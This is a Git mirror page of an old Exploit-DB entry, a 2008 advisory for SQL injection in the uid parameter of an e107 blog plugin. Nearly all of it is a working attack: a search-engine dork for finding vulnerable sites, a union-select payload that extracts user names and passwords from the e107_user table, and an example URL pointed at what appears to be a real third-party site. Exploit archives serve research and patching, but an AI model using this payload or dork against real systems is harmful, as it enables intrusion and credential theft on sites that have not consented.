bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/6856.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

31 lines
No EOL
645 B
Text
Raw Blame History

e107 Plugin macgurublog_menu macgurublog.php (uid) Remote Sql inj
author: ZoRLu
home: z0rlu.blogspot.com
concat: trt-turk@hotmail.com
date: 28/10/2008
n0te: YALNIZLIK YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
n0te: a.q kpss : ) )
dork: allinurl:"macgurublog.php?uid="
exploit:
http://localhost/script_path/macgurublog.php?uid=[SQL]
[SQL]=
-1+union+select+concat(user_name,char(58),user_password,char(58)),2+from+e107_user/*
example:
http://www.dmchat.org.uk/e107_plugins/macgurublog_menu/macgurublog.php?uid=-1+union+select+concat(user_name,char(58),user_password,char(58)),2+from+e107_user/*
thanks: str0ke
# milw0rm.com [2008-10-28]
Reference in a new issue View git blame Copy permalink